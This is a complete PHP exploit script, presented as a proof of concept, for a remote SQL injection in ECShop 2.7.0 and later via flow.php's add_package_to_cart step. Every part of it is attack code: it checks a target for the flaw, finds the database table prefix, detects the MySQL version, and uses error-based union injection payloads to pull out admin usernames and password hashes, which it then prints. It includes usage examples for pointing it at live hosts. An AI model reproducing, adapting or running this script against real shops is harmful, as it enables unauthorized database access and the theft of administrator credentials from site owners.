|
package.php:
<?php
/*
* P.O.C. by xsser - http://www.wooyun.org/bug.php?action=view&id=248
*/
error_reporting(E_ALL & ~E_WARNING);
ini_set('display_errors', '1');
@set_time_limit(0);
hr();
banner();
if (count($argv) < 3 || $argv[1]=='?')
{
usage();
exit;
}
hr();
$host = $argv[1];
$path = $argv[2];
$username = array();
$password = array();
exploit($host, $path);
print "Getting database prefix ...\n";
$pre = prefix($host, $path);
define('PRE',$pre);
print "Verifying MySQL Version...\n";
$version = version($host, $path);
print "Counting admin user ...\n";
$ucount = ucount($host, $path,$version);
print "Admin Users : $ucount\n";
for ($i=1;$i<=$ucount;$i++)
{
print "Injecting username and password for admin $i ...\n";
Inject($host, $path,$i,$username[$i],$password[$i],$version);
print "\n";
}
hr();
print "*\n";
print "* [+] Target Host : $host$path\n";
print "* [+] Admin Founded : $ucount\n";
print "*\n";
for ($i=1;$i<=$ucount;$i++)
{
print "* [+] Username : " . $username[$i] . "\n";
print "* Passowrd : " . $password[$i] . "\n";
print "*\n";
}
hr();
function hr()
{
print "****************************************************************************\n";
}
function banner()
{
print "* [+] Exploit : ECShop >= 2.7.0 (lib_common.php) Remote SQL Injection *\n";
print "* [+] Date : 22-08-2010 *\n";
print "* [+] Author : alibaba *\n";
print "* [+] QQ : 1499281192 *\n";
}
function usage($argv0)
{
hr();
print "* [+] Usage : php package.php <host> <path> *\n";
print "* [+] Example : php package.php www.ecshop.com / *\n";
print "* [+] Example : php package.php www.ecshop.com /shop/ *\n";
hr();
}
function exploit($host, $path)
{
$url = $path . 'flow.php?step=add_package_to_cart';
$data = 'package_info={"package_id":"1\'","number":"1"}';
$buffer = POST($host,80,$url,$data,30);
if (!strrpos($buffer,"MySQL server error report"))
die("No Vulnerability");
else
print "Vulnerability Founded!\n";
}
function prefix($host, $path)
{
$url = $path . "flow.php?step=add_package_to_cart";
$data = 'package_info={"package_id":"1 and 1=2 union all select 1,2,1,4,5,6,1,8,9,0 from ecs_admin_user--","number":"1"}';
$buffer = POST($host,80,$url,$data,30);
if (!strrpos($buffer,"MySQL server error report"))
$pre = 'ecs_';
else
{
preg_match("/FROM `(.+)`\.`(.+)package_goods`/i",$buffer,$m);
$pre = isset($m[2])? $m[2] : '';
}
return $pre;
}
function version($host, $path)
{
$url = $path . "flow.php?step=add_package_to_cart";
$data = 'package_info={"package_id":"-1 union all select 1,2,3,4,5,6,7,8,count(*),concat((Select concat(0x5b,count(user_name),0x5d) FROM ' . PRE . 'admin_user LIMIT 0,1),floor(rand(0)*2))x from information_schema.tables group by x","number":"1"}';
$buffer = POST($host,80,$url,$data,30);
if (preg_match("/\'information_schema.tables\' doesn\'t exist/i",$buffer))
{
print "MySQL Version < 5.0\n";
return false;
}
else
{
print "MySQL Version >= 5.0\n";
return true;
}
}
function ucount($host, $path, $version)
{
$url = $path . "flow.php?step=add_package_to_cart";
if ($version)
{
$data = 'package_info={"package_id":"-1 union all select 1,2,3,4,5,6,7,8,count(*),concat((Select concat(0x5b,count(user_name),0x5d) FROM ' . PRE . 'admin_user LIMIT 0,1),floor(rand(0)*2))x from information_schema.tables group by x","number":"1"}';
$buffer = POST($host,80,$url,$data,30);
preg_match("/Duplicate entry \'\[(.+)\]1\' for key/i",$buffer,$m);
}
else
{
$found = false;
$i=0;
while($found==false && $i<1000)
{
$data = 'package_info={"package_id":"-1 union all select 1,2,3,4,5,6,7,8,9,10 and row(1,1)>(select count(*),concat((Select concat(0x5b,count(user_name),0x5d) from ' . PRE . 'admin_user),floor(rand()*2))x from (select 1 union select 2)a group by x limit 1)","number":"1"}';
$buffer = POST($host,80,$url,$data,30);
if (preg_match("/Duplicate entry \'\[(.+)\]1\' for key/i",$buffer))
{
preg_match("/Duplicate entry \'\[(.+)\]1\' for key/i",$buffer,$m);
$found = true;
}
$i++;
}
}
return $m[1];
}
function Inject($host, $path, $number, &$username, &$password, $version)
{
$number--;
$username = '';
$url = $path . "flow.php?step=add_package_to_cart";
if ($version)
{
$data = 'package_info={"package_id":"-1 union all select 1,2,3,4,5,6,7,8,count(*),concat((Select concat(0x5b,user_name,0x3a,password,0x5d) FROM ' . PRE . 'admin_user LIMIT ' . $number . ',1),floor(rand(0)*2))x from information_schema.tables group by x","number":"1"}';
$buffer = POST($host,80,$url,$data,30);
preg_match("/Duplicate entry \'\[(.+):(.+)\]1\' for key/i",$buffer,$m);
}
else
{
$found = false;
$i=0;
while($found==false && $i<1000)
{
$data = 'package_info={"package_id":"-1 union all select 1,2,3,4,5,6,7,8,9,10 and row(1,1)>(select count(*),concat((Select concat(0x5b,user_name,0x3a,password,0x5d) from ' . PRE . 'admin_user LIMIT ' . $number . ',1),floor(rand()*2))x from (select 1 union select 2)a group by x limit 1)","number":"1"}';
$buffer = POST($host,80,$url,$data,30);
if (preg_match("/Duplicate entry \'\[(.+)\]1\' for key/i",$buffer))
{
preg_match("/Duplicate entry \'\[(.+):(.+)\]1\' for key/i",$buffer,$m);
$found = true;
}
$i++;
}
}
$username = $m[1];
$password = $m[2];
}
function POST($host,$port,$path,$data,$timeout, $cookie='') {
$buffer='';
$fp = fsockopen($host,$port,$errno,$errstr,$timeout);
if(!$fp) die($host.'/'.$path.' : '.$errstr.$errno);
else {
fputs($fp, "POST $path HTTP/1.0\r\n");
fputs($fp, "Host: $host\r\n");
fputs($fp, "Content-type: application/x-www-form-urlencoded\r\n");
fputs($fp, "Content-length: ".strlen($data)."\r\n");
fputs($fp, "Connection: close\r\n\r\n");
fputs($fp, $data."\r\n\r\n");
while(!feof($fp))
{
$buffer .= fgets($fp,4096);
}
fclose($fp);
}
return $buffer;
}
?>
|